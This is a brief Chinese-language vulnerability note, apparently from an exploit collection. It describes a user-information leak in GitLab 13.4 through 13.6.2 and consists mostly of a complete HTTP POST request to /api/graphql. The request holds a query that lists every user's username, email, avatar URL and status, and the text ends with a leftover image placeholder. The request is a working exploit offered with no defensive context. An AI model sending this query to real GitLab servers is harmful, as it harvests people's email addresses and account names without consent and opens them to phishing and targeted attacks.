GitLab 13.4 – 13.6.2
    GitLab中存在Graphql接口 输入构造的数据时会泄露用户邮箱和用户名

    1. POST /api/graphql HTTP/1.1
    2. Host: xxx.xxx.xxx.xxx
    3. Content-Length: 212
    4. Cookie: xxxxxxxxxxxxxxxx
    5. Content-Type: application/json
    7. {"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null}

    图片.png